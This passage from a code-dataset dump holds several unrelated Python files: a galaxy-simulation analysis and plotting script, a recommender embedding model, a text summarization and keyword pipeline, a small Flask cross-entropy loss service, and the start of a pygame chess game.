'/home/akinshol/Data/Sims/rogue.cosmo25cmb.4096g5HbwK1BH/rogue.cosmo25cmb.4096g5HbwK1BH.004096.dir/rogue.cosmo25cmb.4096g5HbwK1BH.004096'\n\n            if s=='storm':\n                path = '/home/akinshol/Data/Sims/storm.cosmo25cmb.4096g5HbwK1BH/storm.cosmo25cmb.4096g5HbwK1BH.004096/storm.cosmo25cmb.4096g5HbwK1BH.004096'\n\n            if s != sprev:\n                sim = pynbody.load(tfiles[tfile_it])\n                tfile_it = tfile_it + 1\n                sprev = s \n            h_dummy = sim.halos(dummy = True)\n            loc = []\n            rvir = []\n            for AHFhalo in h_dummy:\n                properties = AHFhalo.properties \n                if (properties['mass'] > min_massiveHalo):\n#                    print('Halo id: ',properties['halo_id'])\n                    loc.append(np.array([properties['Xc']/properties['h'], properties['Yc']/properties['h'], properties['Zc']/properties['h']]))\n                    rvir.append(properties['Rvir'])\n                    \n            loc = np.array(loc)\n            rvir = np.array(rvir)\n\n            properties = h_dummy[int(data['haloid'].tolist()[i])].properties\n            distances.append(min(((properties['Xc'] - loc[:,0])**2 + (properties['Yc'] - loc[:,1])**2 + (properties['Zc'] - loc[:,2])**2)**(0.5)))\n            minind = np.where((((properties['Xc'] - loc[:,0])**2 + (properties['Yc'] - loc[:,1])**2 + (properties['Zc'] - loc[:,2])**2)**(0.5)) == distances[-1])\n            hostrvirs.append(rvir[minind]*0.6776942783267969)\n\n    return np.array(distances),np.array(hostrvirs)\n\n\n\nif __name__ == '__main__': \n    if (socket.gethostname() == \"quirm.math.grinnell.edu\"):\n        prefix = 
'/home/christenc/Data/Sims/'\n outprefix = '/home/christenc/Figures/marvel/marvelJL'\n else:\n prefix = '/home/christensen/Storage2/UW/MolecH/Cosmo/'\n outprefix = '/home/christensen/Storage2/UW/MolecH/Cosmo/marvelJL'\n plt.figure(1)\n plt.clf()\n\n presentation = False\n if presentation:\n outbase = outprefix + '_pres_'\n plt.style.use(['default','/home/christenc/.config/matplotlib/presentation.mplstyle'])\n plt_width = 8 #inches\n aspect_ratio = 3.0/4.0\n legendsize = 16\n dpi = 200\n markersize = 100\n ms_scale = 1\n lw = mpl.rcParams['lines.linewidth'] - 1\n edgewidth = 1\n else:\n outbase = outprefix #+ 'marvel'\n plt.style.use(['default','/home/christenc/.config/matplotlib/article.mplstyle'])\n plt_width = 3.5 #inches\n aspect_ratio = 3.0/4.0\n legendsize = 5\n dpi = 300\n markersize = 25\n ms_scale = 0.25\n lw = mpl.rcParams['lines.linewidth']\n edgewidth = 0.7\n \n if (socket.gethostname() == \"ozma.grinnell.edu\"):\n dataprefix = '/home/christensen/Code/Datafiles/' \n else:\n dataprefix = '/home/christenc/Code/Datafiles/'\n f = open(dataprefix+'mstar_vs_mhalo_4Charlotte.txt', 'r')\n fdmdata = []\n for line in f:\n line = line.strip()\n columns = line.split()\n if len(columns) == 12 and columns[0] != 'Volume':\n source = {}\n source['simname'] = columns[0]\n source['halogrp_z0'] = int(columns[1])\n source['halogrp_Mpeak'] = int(columns[2])\n source['Mpeak_snap'] = float(columns[3])\n source['Mpeak'] = float(columns[4])\n source['Mhalo_z0'] = float(columns[5])\n source['Mstar_z0'] = float(columns[6])\n source['Mstar_z0_photo'] = float(columns[7])\n source['Mstar_Mpeak'] = float(columns[8])\n source['Mstar_Mpeak_z0'] = float(columns[9])\n source['Vmag'] = float(columns[10])\n source['type'] = columns[11] \n fdmdata.append(source)\n f.close()\n fdmdata = pd.DataFrame(fdmdata)\n\n \n tfile_base_cm = 'cptmarvel.cosmo25cmb.4096g5HbwK1BH'\n tfile_cm = prefix + 'cptmarvel.cosmo25cmb/cptmarvel.cosmo25cmb.4096g5HbwK1BH/cptmarvel.cosmo25cmb.4096g5HbwK1BH.004096/cptmarvel.cosmo25cmb.4096g5HbwK1BH.004096' #'cptmarvel.cosmo25cmb.4096g5HbwK1BH.004096'\n\n tfile_r = prefix + 'rogue.cosmo25cmb/rogue.cosmo25cmb.4096g5HbwK1BH/rogue.cosmo25cmb.4096g5HbwK1BH.004096/rogue.cosmo25cmb.4096g5HbwK1BH.004096'\n tfile_base_r = 'rogue.cosmo25cmb.4096g5HbwK1BH'\n\n tfile_e = prefix + 'elektra.cosmo25cmb/elektra.cosmo25cmb.4096g5HbwK1BH/elektra.cosmo25cmb.4096g5HbwK1BH.004096/elektra.cosmo25cmb.4096g5HbwK1BH.004096'\n tfile_base_e = 'elektra.cosmo25cmb.4096g5HbwK1BH'\n\n tfile_s = prefix + 'storm.cosmo25cmb/storm.cosmo25cmb.4096g5HbwK1BH/storm.cosmo25cmb.4096g5HbwK1BH.004096/storm.cosmo25cmb.4096g5HbwK1BH.004096'\n tfile_base_s = 'storm.cosmo25cmb.4096g5HbwK1BH'\n \n tfile_base_1 = 'h148.cosmo50PLK.3072g3HbwK1BH'\n tfile_1 = prefix + 'h148.cosmo50PLK.3072g/h148.cosmo50PLK.3072g3HbwK1BH/snapshots_200bkgdens/h148.cosmo50PLK.3072g3HbwK1BH.004096' #\n tfile_1 = prefix + 'h148.cosmo50PLK.3072g/h148.cosmo50PLK.3072g3HbwK1BH/h148.cosmo50PLK.3072g3HbwK1BH.004096/h148.cosmo50PLK.3072g3HbwK1BH.004096'\n \n tfile_base_1hr = 'h148.cosmo50PLK.6144g3HbwK1BH/'\n tfile_1hr = prefix + 'h148.cosmo50PLK.6144g/h148.cosmo50PLK.6144g3HbwK1BH/h148.cosmo50PLK.6144g3HbwK1BH.004096/ahf_200/h148.cosmo50PLK.6144g3HbwK1BH.004096'\n \n tfile_base_2 = 'h229.cosmo50PLK.3072gst5HbwK1BH'\n tfile_2 = prefix + 'h229.cosmo50PLK.3072g/h229.cosmo50PLK.3072gst5HbwK1BH/snapshots_200bkgdens/h229.cosmo50PLK.3072gst5HbwK1BH.004096' #\n tfile_2 = prefix + 
'h229.cosmo50PLK.3072g/h229.cosmo50PLK.3072gst5HbwK1BH/h229.cosmo50PLK.3072gst5HbwK1BH.004096/h229.cosmo50PLK.3072gst5HbwK1BH.004096' \n    \n    tfile_base_3 = 'h242.cosmo50PLK.3072gst5HbwK1BH'\n    tfile_3 = prefix + 'h242.cosmo50PLK.3072g/h242.cosmo50PLK.3072gst5HbwK1BH/snapshots_200bkgdens/h242.cosmo50PLK.3072gst5HbwK1BH.004096' #\n    tfile_3 = prefix + 'h242.cosmo50PLK.3072g/h242.cosmo50PLK.3072gst5HbwK1BH/h242.cosmo50PLK.3072gst5HbwK1BH.004096/h242.cosmo50PLK.3072gst5HbwK1BH.004096'\n\n    tfile_base_4 = 'h329.cosmo50PLK.3072gst5HbwK1BH'\n    tfile_4 = prefix + 'h329.cosmo50PLK.3072g/h329.cosmo50PLK.3072gst5HbwK1BH/snapshots_200bkgdens/h329.cosmo50PLK.3072gst5HbwK1BH.004096' #\n    tfile_4 = prefix + 'h329.cosmo50PLK.3072g/h329.cosmo50PLK.3072gst5HbwK1BH/h329.cosmo50PLK.3072gst5HbwK1BH.004096/h329.cosmo50PLK.3072gst5HbwK1BH.004096'\n    \n    tfile_base_4hr = 'h329.cosmo50PLK.6144g5HbwK1BH'\n    tfile_4hr = prefix + 'h329.cosmo50PLK.6144g/h329.cosmo50PLK.6144g5HbwK1BH/h329.cosmo50PLK.6144g5HbwK1BH.004096/ahf_200/h329.cosmo50PLK.6144g5HbwK1BH.004096' #  \n    \n    tfiles = [tfile_cm, tfile_e, tfile_r, tfile_s, tfile_1, tfile_1hr, tfile_2, tfile_3, tfile_4, tfile_4hr]\n    tfile_base = [tfile_base_cm, tfile_base_e, tfile_base_r, tfile_base_s, tfile_base_1, tfile_base_1hr, tfile_base_2, tfile_base_3, tfile_base_4, tfile_base_4hr]\n\n    objs_pd = None \n    for tfile, base in zip(tfiles, tfile_base):\n        objs_dat = []\n        print(tfile)\n        '''\n        f=open(tfile + '.MAP.data', 'rb')\n        while 1:\n            try:\n                objs_dat.append(pickle.load(f))\n            except EOFError:\n                break \n        f.close()\n        '''\n        objs_dat = pd.read_csv(tfile + '.MAP.data.csv')\n        if len(objs_dat) == 1:\n            temp = pd.DataFrame(objs_dat[0])\n        else:\n            temp = pd.DataFrame(objs_dat)\n        simname = base.split('.')[0]\n        if (base.split('.')[2])[0] == '6':\n            simname = simname+'_6144'\n        temp['M_star'] = temp['mstar']\n        temp['mass'] = temp['mvir']\n        \n        temp['sim'] = [simname]*len(temp)\n        if not 'massiveDist' in temp:\n            #distance_to_nearest_host returns (distances, host rvirs); store both as columns ('hostrvirs' column name assumed, unused downstream)\n            temp['massiveDist'], temp['hostrvirs'] = distance_to_nearest_host(temp,[tfile])\n            #temp.to_pickle(tfile + '.MAP.data')\n\n        temp.to_csv(tfile + '.MAP.data.csv', index=False)\n\n        if objs_pd is None: \n            objs_pd = temp\n        else:\n            objs_pd = objs_pd.append(temp, ignore_index = True)    \n\n    #Match halos between my and Ferah's data    \n    fdmdata_mod = fdmdata.copy()\n    objs_pd = match_halos(objs_pd, fdmdata_mod)\n    #remove entries (rows) from objs_pd that have no match in Ferah's data\n    index_rm = objs_pd[(objs_pd['m200_haloid']).isnull()].index\n    objs_pd = objs_pd.drop(index_rm)\n    \n    ind = 0\n    tau90 = np.empty(len(objs_pd))    \n    for index, row in objs_pd.iterrows():\n        row['sfh'] = row['sfh'].replace('  ',' ')\n        row['sfh'] = row['sfh'].replace('  ',' ')\n        row['sfh'] = row['sfh'].replace('  ',' ')\n        row['sfh'] = row['sfh'].replace('  ',' ')    \n        sfh_str = ((row['sfh'])[2:-1].replace('\\n','')).split(' ')\n        sfh = []\n        for x in sfh_str:\n            if x != '':\n                sfh.append(float(x))\n        sfh = np.array(sfh)\n        #sfh = np.array([float(x) for x in sfh_str])\n        row['sfhbins'] = row['sfhbins'].replace('  ',' ')\n        row['sfhbins'] = row['sfhbins'].replace('  ',' ')\n        row['sfhbins'] = row['sfhbins'].replace('  ',' ')\n        row['sfhbins'] = row['sfhbins'].replace('  ',' ')\n        sfhbins_str = ((row['sfhbins'])[2:-1].replace('\\n','')).split(' ')\n        sfhbins = []\n        for x in sfhbins_str:\n            if x != '':\n                sfhbins.append(float(x))\n        sfhbins = np.array(sfhbins)\n        #sfhbins = np.array([float(x) for x in sfhbins_str])\n        #sfh = row['sfh']\n        #sfhbins = row['sfhbins']\n        \n        if len(sfhbins) != len(sfh):\n            xarr = sfhbins[1:] - (sfhbins[1] - sfhbins[0])\n        else:\n            
xarr = sfhbins[:]\n yarr = np.cumsum(sfh)/max(np.cumsum(sfh))\n if (yarr[0] >= 0.9):\n tau90[ind] = xarr[0]\n else:\n interp = interp1d(yarr, xarr) #, kind='cubic')\n if np.isnan(interp(0.9)):\n tau90[ind] = 0\n else:\n tau90[ind] = float(interp(0.9))\n ind = ind + 1 \n\n objs_pd['tau90'] = tau90\n \n halo_label = {'halo_label': \"\"}\n objs_pd = objs_pd.join(pd.DataFrame(columns=halo_label))\n objs_pd.loc[~objs_pd['m200_haloid'].isnull(),'halo_label'] = objs_pd[~objs_pd['m200_haloid'].isnull()]['sim']+objs_pd[~objs_pd['m200_haloid'].isnull()]['m200_haloid'].astype(str)\n objs_pd = objs_pd.set_index('halo_label')\n\n fdmdata = fdmdata.join(pd.DataFrame(columns=halo_label))\n fdmdata['halo_label'] = fdmdata['simname']+fdmdata['halogrp_z0'].astype(str)\n fdmdata = fdmdata.set_index('halo_label') \n\n objs_pd_comb = pd.concat([objs_pd,fdmdata], join=\"inner\", axis=1)\n\n '''\n plt.clf()\n plt.figure(1)\n ind = 0\n for index, row in objs_pd.iterrows():\n if (type(row['sfhbins']) == float):\n tau90[ind] = 0\n else:\n if len(row['sfhbins']) != len(row['sfh']):\n xarr = row['sfhbins'][1:] - (row['sfhbins'][1] - row['sfhbins'][0])\n else:\n xarr = row['sfhbins'][:]\n yarr = np.cumsum(row['sfh'])/max(np.cumsum(row['sfh']))\n plt.clf()\n plt.plot(xarr,yarr)\n plt.plot([0,14],[0.9,0.9])\n if (yarr[0] >= 0.9):\n tau90[ind] = xarr[0]\n else:\n interp = interp1d(yarr, xarr) #, kind='cubic')\n print(ind,interp(0.9))\n tau90[ind] = float(interp(0.9))\n ind = ind + 1\n '''\n\n\n #scalarMap = cm.ScalarMappable(norm=cNorm, cmap=cmx)\n plt.clf()\n fig1 = plt.figure(1,figsize = (plt_width,plt_width*aspect_ratio*1.2))\n fig1.set_size_inches(plt_width,plt_width*aspect_ratio*1.2)\n fig1.clear()\n #gs = fig2.add_gridspec(1)\n #axs = gs.subplots() #, constrained_layout=True)\n #axs = axs.flatten()\n #ax1 = axs[0]\n #fig1.subplots(constrained_layout)\n gs = gridspec.GridSpec(ncols = 1,nrows = 2, figure=fig1, height_ratios=[1,15])\n ax1 = fig1.add_subplot(gs[1])\n ax1sub = fig1.add_subplot(gs[0])\n\n cmx = plt.get_cmap(\"cool_r\") \n cNorm = colors.Normalize(vmin=0, vmax = 14) \n q = ax1.scatter(objs_pd[objs_pd['SFR'] < 1e-11]['massiveDist'],objs_pd['M_star'][objs_pd['SFR'] < 1e-11],s = (objs_pd['Rvir'][objs_pd['SFR'] < 1e-11]*2*ms_scale).tolist(), c = tau90[objs_pd['SFR'] < 1e-11], cmap = cmx, norm = cNorm,edgecolor = 'k',marker = 'D', linewidths = edgewidth)\n sf = ax1.scatter(objs_pd[objs_pd['SFR'] >= 1e-11]['massiveDist'],objs_pd['M_star'][objs_pd['SFR'] >= 1e-11],s = (objs_pd['Rvir'][objs_pd['SFR'] >= 1e-11]*2*ms_scale).tolist(), c = tau90[objs_pd['SFR'] >= 1e-11], cmap = cmx, norm = cNorm,edgecolor = 'k', linewidths = edgewidth)\n #plt.scatter(objs_pd_e['h1dist'],objs_pd_e['M_star'])\n lgnd = ax1.legend([q,sf],['Quenched','Star forming'],scatterpoints = 1,facecolor = 'white',loc = 3,framealpha = 0,frameon = False)\n lgnd.legendHandles[0]._sizes = [markersize]\n lgnd.legendHandles[1]._sizes = [markersize]\n ax1.set_xscale('log')\n ax1.set_yscale('log')\n ax1.axis([17, 7e3, 1e2, 1e10])\n ax1.set_ylabel(r'M$_*$/M$_\\odot$')\n ax1.set_xlabel(r'Distance to massive galaxy (kpc)')\n sm = plt.cm.ScalarMappable(cmap=cmx, norm=cNorm)\n #ax1sub = fig1.add_subplot([0.15,0.87,0.35,0.03])\n #cb = plt.colorbar(sm, ax=ax1sub, orientation='horizontal',aspect = 20) \n cb = mpl.colorbar.ColorbarBase(ax1sub, cmap=cmx, norm=cNorm, orientation='horizontal')\n cb.set_label(r\"$\\tau_{90}$ (Gyr)\")\n #fig1.subplots_adjust(hspace = 0.3)\n fig1.tight_layout()\n fig1.subplots_adjust(hspace = 0.4)\n fig1.show()\n fig1.savefig(outbase + 
'_distance_smass_t90.png',dpi = dpi) \n\n'''\n fig1= plt.figure() \n ax1 = fig1.add_subplot(1,1,1)\n ax1.plot(objs_pd_comb['distances'],objs_pd_comb['Mhalo_z0']/objs_pd_comb['Mpeak'],'x')\n ax1.plot(objs_pd_comb['Mhalo_z0'],objs_pd_comb['Mstar_z0'],'o')\n ax1.plot(objs_pd_comb['Mpeak'],objs_pd_comb['Mstar_z0'],'o')\n ax1.set_yscale('log')\n ax1.set_xscale('log')\n'''\n \n","repo_name":"CharlotteRuth/python_analysis","sub_path":"quench_v_distance.py","file_name":"quench_v_distance.py","file_ext":"py","file_size_in_byte":18705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26213427434","text":"import numpy as np\n\nfrom hw2.datasets.train import TrainDataset\nfrom hw2.embeddings_builder import EmbeddingsBuilder\nfrom hw2.models.base import Model\n\n\nclass EmbeddingModel(Model):\n def __init__(self, embedding_dim: int, random_state: int, verbose: bool = True):\n super().__init__(random_state, verbose)\n self._embeddings = EmbeddingsBuilder(embedding_dim, random_state)\n\n def fit(self, dataset: TrainDataset) -> \"EmbeddingModel\":\n self._embeddings.fit(dataset)\n return self\n\n def predict(self, dataset: TrainDataset) -> np.ndarray:\n scores = np.zeros(len(dataset))\n\n users = dataset.pandas_df[\"msno\"].to_numpy()\n items = dataset.pandas_df[\"song_id\"].to_numpy()\n\n mask = np.array([self._embeddings.has_user(user) and self._embeddings.has_item(item)\n for user, item in zip(users, items)])\n\n user_embs = self._embeddings.get_user_embeddings(users[mask])\n item_embs = self._embeddings.get_item_embeddings(items[mask])\n scores[mask] = np.sum(user_embs * item_embs, axis=1)\n\n return scores\n\n # def _get_user_emb(self, user: str) -> np.ndarray:\n # if not self._embeddings.has_user(user):\n # return self._embeddings.default_embedding\n #\n # return self._embeddings.get_user_embeddings([user])[0]\n #\n # def _get_item_emb(self, item: str) -> np.ndarray:\n # if not self._embeddings.has_item(item):\n # return self._embeddings.default_embedding\n #\n # return self._embeddings.get_item_embeddings([item])[0]\n","repo_name":"Sushentsev/recommendation-systems","sub_path":"hw2/models/embeddings_model.py","file_name":"embeddings_model.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71145356027","text":"#!/usr/bin/env python3\n\nimport logging\nimport sys\n\nimport pandas as pd\nimport regex as re\nimport unidecode\nfrom keybert import KeyBERT\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\nfrom summarizer import Summarizer\nfrom tqdm import tqdm\n\ntqdm.pandas()\n\nTEST_FILE = './02-summarize-test.txt'\nSRC_FILE = './data/campaigns.parquet.gzip'\nTGT_FILE = './data/campaigns_summaries.parquet.gzip'\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(level=logging.INFO)\nfh = logging.StreamHandler()\nfh_formatter = logging.Formatter(fmt='%(asctime)s %(levelname)s: %(message)s',\n datefmt='%m/%d/%Y %I:%M:%S%p')\nfh.setFormatter(fh_formatter)\nlogger.addHandler(fh)\n\n# Raise level for other loggers\nfor log_name, log_obj in logging.Logger.manager.loggerDict.items():\n if log_name != __name__:\n logging.getLogger(log_name).setLevel(logging.ERROR)\n\n\ndef get_summary(df):\n def summarize(body):\n model = Summarizer()\n result = model(body, num_sentences=3)\n return result\n\n logger.info('Getting summaries...')\n df['summary'] = df.progress_apply(lambda x: summarize(x['details']), axis=1)\n return 
df\n\n\ndef get_preprocessed_text(df):\n def preprocess(body):\n # Get rid of accents\n unaccented = unidecode.unidecode(body)\n\n # Get rid of punctuation & numbers\n letters_only = re.sub(\"[^a-zA-Z]\", \" \", unaccented)\n\n # Get all lowercase words\n words = letters_only.lower().split()\n\n # Remove stop words\n stops = set(stopwords.words('english'))\n meaningful_words = [w for w in words if w not in stops]\n\n # Instantiate and run Lemmatizer\n lemmatizer = WordNetLemmatizer()\n tokens_lem = [lemmatizer.lemmatize(i) for i in meaningful_words]\n\n # Join back into string\n result = \" \".join(tokens_lem)\n\n # Join into string and return the result.\n return result\n\n logger.info('Getting preprocessed text...')\n df['details_clean'] = df.progress_apply(lambda x: preprocess(x['details']), axis=1)\n df['summary_clean'] = df.progress_apply(lambda x: preprocess(x['summary']), axis=1)\n return df\n\n\ndef get_ngram1(df):\n def ngram1(body):\n model = KeyBERT('distilbert-base-nli-mean-tokens')\n keywords = model.extract_keywords(body, top_n=5)\n return keywords\n\n logger.info('Getting ngram1...')\n df['ngram1_details'] = df.progress_apply(lambda x: ngram1(x['details_clean']), axis=1)\n df['ngram1_summary'] = df.progress_apply(lambda x: ngram1(x['summary_clean']), axis=1)\n return df\n\n\ndef get_ngram2(df):\n def ngram2(body):\n model = KeyBERT('distilbert-base-nli-mean-tokens')\n keywords = model.extract_keywords(body, keyphrase_ngram_range=(1, 2), stop_words='english', top_n=5)\n return keywords\n\n logger.info('Getting ngram2...')\n df['ngram2_details'] = df.progress_apply(lambda x: ngram2(x['details_clean']), axis=1)\n df['ngram2_summary'] = df.progress_apply(lambda x: ngram2(x['summary_clean']), axis=1)\n return df\n\n\ndef get_ngram_maxsum(df):\n def ngram_maxsum(body):\n \"\"\"Max Sum Similarity\n To diversify the results, we take the 2 x top_n most similar words/phrases to the document.\n Then, we take all top_n combinations from the 2 x top_n words and extract the combination\n that are the least similar to each other by cosine similarity.\n \"\"\"\n model = KeyBERT('distilbert-base-nli-mean-tokens')\n keywords = model.extract_keywords(body, keyphrase_ngram_range=(3, 3), stop_words='english', use_maxsum=True,\n nr_candidates=20, top_n=5)\n return keywords\n\n logger.info('Getting ngram maxsum...')\n df['maxsum_details'] = df.progress_apply(lambda x: ngram_maxsum(x['details_clean']), axis=1)\n df['maxsum_summary'] = df.progress_apply(lambda x: ngram_maxsum(x['summary_clean']), axis=1)\n return df\n\n\ndef get_ngram_maxmarginal(df):\n def ngram_maxmarginal(body):\n \"\"\"Maximal Marginal Relevance\n To diversify the results, create keywords based on cosine similarity.\n \"\"\"\n model = KeyBERT('distilbert-base-nli-mean-tokens')\n keywords = model.extract_keywords(body, keyphrase_ngram_range=(3, 3), stop_words='english', use_mmr=True,\n diversity=0.7, top_n=5)\n return keywords\n\n logger.info('Getting ngram maxmarginal...')\n df['maxmarginal_details'] = df.progress_apply(lambda x: ngram_maxmarginal(x['details_clean']), axis=1)\n df['maxmarginal_summary'] = df.progress_apply(lambda x: ngram_maxmarginal(x['summary_clean']), axis=1)\n return df\n\n\nif __name__ == '__main__':\n sys.stdout = open(TEST_FILE, 'w')\n\n logger.info('Starting test.')\n campaigns = pd.read_parquet(SRC_FILE)\n campaigns = campaigns.head(2)\n campaigns = get_summary(campaigns)\n campaigns = get_preprocessed_text(campaigns)\n campaigns = get_ngram1(campaigns)\n campaigns = get_ngram2(campaigns)\n campaigns = 
get_ngram_maxsum(campaigns)\n campaigns = get_ngram_maxmarginal(campaigns)\n\n for campaign in range(len(campaigns)):\n for col in campaigns.columns:\n print(f'{col.upper()}\\n{campaigns.loc[campaign, col]}\\n')\n print('-------------')\n\n logger.info('Done with test.')\n\n logger.info('STARTING ON FULL DATASET')\n campaigns = pd.read_parquet(SRC_FILE)\n campaigns = get_summary(campaigns)\n campaigns = get_preprocessed_text(campaigns)\n campaigns = get_ngram2(campaigns)\n\n logging.info('Getting separate phrases & values columns...')\n campaigns['details_phrases'] = campaigns.progress_apply(lambda x: [x[0] for x in x['ngram2_details']], axis=1)\n campaigns['details_values'] = campaigns.progress_apply(lambda x: [x[1] for x in x['ngram2_details']], axis=1)\n campaigns['summary_phrases'] = campaigns.progress_apply(lambda x: [x[0] for x in x['ngram2_summary']], axis=1)\n campaigns['summary_values'] = campaigns.progress_apply(lambda x: [x[1] for x in x['ngram2_summary']], axis=1)\n\n # Save file with url, summary, and keywords only\n logging.info(f'Saving {TGT_FILE}')\n cols = ['url', 'summary', 'details_phrases', 'details_values', 'summary_phrases', 'summary_values']\n campaigns[cols].to_parquet(TGT_FILE, compression='gzip')\n\n logger.info('Done.')\n","repo_name":"dawngraham/cs688-gnad","sub_path":"02-summarize.py","file_name":"02-summarize.py","file_ext":"py","file_size_in_byte":6368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"23397745189","text":"import numpy as np\nimport blosc\nfrom flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\n@app.route(\"/forward\", methods=[\"POST\"])\ndef forward():\n logits = blosc.unpack_array(bytes.fromhex(request.form[\"logits\"]))\n targets = blosc.unpack_array(bytes.fromhex(request.form[\"targets\"]))\n\n targets = targets.reshape(-1)\n m = targets.shape[0]\n\n loss = np.sum(-np.log(logits[range(m), targets])) / m\n loss = loss.reshape(-1,1)\n loss = blosc.pack_array(loss)\n res = {\"loss\": loss.hex()}\n return jsonify(res)\n\n@app.route(\"/backward\", methods=[\"POST\"])\ndef backward():\n logits = blosc.unpack_array(bytes.fromhex(request.form[\"logits\"]))\n targets = blosc.unpack_array(bytes.fromhex(request.form[\"targets\"]))\n\n grad = request.form[\"grad\"]\n grad = blosc.unpack_array(bytes.fromhex(grad))\n\n targets = targets.reshape(-1)\n m = targets.shape[0]\n\n logits[range(m), targets] -= 1\n out = grad * logits / m\n out = blosc.pack_array(out)\n res = {\"out\": out.hex()}\n return jsonify(res)\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=30006)","repo_name":"iVishalr/dockerNN","sub_path":"dockernn/nn/cross_entropy_loss/cross_entropy_loss.py","file_name":"cross_entropy_loss.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"6"} +{"seq_id":"1102524849","text":"\"\"\"\nHandles rendering and game logic\n\"\"\"\nimport pygame\nfrom json import load\nfrom board import Board\nfrom pathlib import Path\nfrom button import TextButton\nfrom button import ImageButton\nimport texture\nimport sys\nimport time\nimport button\nimport player\nimport piece\nimport engine\n\nclass SceneManager():\n \"\"\"\n Handles rendering and game logic\n \"\"\"\n def __init__(self):\n pygame.init()\n # Open config file, and assign read json to config\n config_f = open(Path(\"config.json\"))\n self.config = load(config_f)\n config_f.close()\n\n # Create window, and scale it to be 
fullscreen\n win = pygame.display.set_mode((0,0))\n self.screen_resolution = [win.get_width(), win.get_height()]\n self.win_size = self.screen_resolution\n self.win = pygame.display.set_mode(self.win_size)\n\n # Set window caption, as indicated in config\n pygame.display.set_caption(self.config[\"title_text\"])\n\n # Load in texture pack indicated in config, and load in starting position\n self.board = Board(\"assets/images/board_and_pieces/\"+ self.config[\"texture_pack\"], [48, 48])\n self.board.loadfen(self.config[\"starting_position\"])\n\n # \"Game states\", indicate which function should be called at start of every frame\n self.MAINGAME_STATE = 1\n self.state = self.MAINGAME_STATE\n self.state_to_function = {self.MAINGAME_STATE: self.maingame}\n\n # Unscaled size the actual surface of game\n self.surface_size = [950, 540]\n self.surface = pygame.Surface(self.surface_size)\n\n # Offset applied from (0,0)\n self.board_offset = [round((self.surface_size[0] - self.board.square_size[0] * 8) / 2), round((self.surface_size[1] - self.board.square_size[0] * 8) / 2)]\n self.board_bottomright = [self.board_offset[0]+ self.board.surface.get_width(), self.board_offset[1]+ self.board.surface.get_height()]\n\n\n # Colors used in ui\n self.ui_bg = (10,10,10)\n self.ui_white = (255,255,255)\n self.ui_black = (0,0,0)\n self.ui_secondary = (30,30,30)\n self.ui_text = (255,255,255)\n self.ui_popup = (100, 100, 255)\n \n # Fonts used in ui\n self.title_font = pygame.font.Font(Path(\"assets/fonts/Gamer.TTF\"),50)\n self.buttons_font = pygame.font.Font(Path(\"assets/fonts/Gamer.TTF\"),50)\n\n # Title surface, and its position\n self.title_surface = self.title_font.render(self.config[\"title_text\"], False, self.ui_text)\n self.title_pos = [texture.center_x(self.title_surface, self.surface_size), 20]\n\n # Directory containing sounds\n self.sound_pack = \"assets/sounds/\" + self.config[\"sound_pack\"] +\"/\"\n \n # Sounds\n self.click_sound = self.sound_pack + \"click.wav\"\n\n\n\n # \"main ui\" buttons\n buttons = [\"Play\", \"Settings\", \"Exit\"]\n self.main_ui_buttons = button.ButtonHandler([])\n start = [35, self.board_offset[1]+5]\n height = 50\n width = 200\n gap = 5 + height\n for y in range (0,3):\n self.main_ui_buttons.buttons.append( button.TextButton([width,height], [start[0],start[1] + gap * y],Path(self.sound_pack + \"click.wav\"), buttons[y], self.buttons_font, self.ui_text, self.ui_secondary))\n\n\n # Player list, and portret ui\n self.portrets = \"assets/images/ui/portrets/\"+self.config[\"portrets\"]+\"/\"\n self.portret_size = [75,75]\n self.players = [player.Human(self.portrets + \"human.png\", self.portret_size, \"Human\", self.buttons_font, self.ui_text), player.RandomBot(self.portrets + \"bot.png\", self.portret_size, \"Random\", self.buttons_font, self.ui_text), player.BasicBot(self.portrets + \"bot.png\", self.portret_size, \"Dumbo1\", self.buttons_font, self.ui_text, False, 1), player.BasicBot(self.portrets + \"bot.png\", self.portret_size, \"Dumbo2\", self.buttons_font, self.ui_text, False, 2), player.BasicBot(self.portrets + \"bot.png\", self.portret_size, \"Dumbo3\", self.buttons_font, self.ui_text, False, 3), player.BasicBot(self.portrets + \"bot.png\", self.portret_size, \"4\", self.buttons_font, self.ui_text, False, 4), player.BasicBot(self.portrets + \"bot.png\", self.portret_size, \"Dumbo5\", self.buttons_font, self.ui_text, False, 5), player.BasicBot(self.portrets + \"bot.png\", self.portret_size, \"Dumbo6\", self.buttons_font, self.ui_text, False, 6)]\n self.player_index 
= 0\n self.active_players = [None, None]\n self.total_players = len(self.players)\n self.portret_underlay_gap = 10\n self.other_ui_rect = pygame.Rect([start[0],start[1]*3+height - 20],[width, height*4])\n self.portret_rect = pygame.Rect([self.other_ui_rect.left +texture.center_x(self.portret_size, self.other_ui_rect.size), self.other_ui_rect.top + round(self.portret_size[1] /4)], self.portret_size)\n self.portret_underlay = self.portret_rect.move([-self.portret_underlay_gap, -self.portret_underlay_gap])\n self.portret_underlay.size = [self.portret_underlay.width + self.portret_underlay_gap*2, self.portret_underlay.height+self.portret_underlay_gap*2]\n self.portret_name_rect = self.portret_rect.move(0, self.portret_size[1]+20)\n self.arrow_buttons = button.ButtonHandler([])\n arrow_buttons_size = [40,40]\n arrow_buttons_gap = 18\n self.arrow_buttons.buttons.append(button.TextButton(arrow_buttons_size, [self.portret_name_rect.left-arrow_buttons_gap-arrow_buttons_size[0], self.portret_name_rect.top] , Path(self.sound_pack + \"click.wav\"), \"<\", self.buttons_font, self.ui_text, self.ui_bg))\n self.arrow_buttons.buttons.append(button.TextButton(arrow_buttons_size, [self.portret_name_rect.right+arrow_buttons_gap, self.portret_name_rect.top] , Path(self.sound_pack + \"click.wav\"), \">\", self.buttons_font, self.ui_text, self.ui_bg))\n confirm_button_size = [150,35]\n confirm_button_gap = 50\n self.confirm_button = button.TextButton(confirm_button_size, [self.other_ui_rect.left +texture.center_x(confirm_button_size, self.other_ui_rect.size), 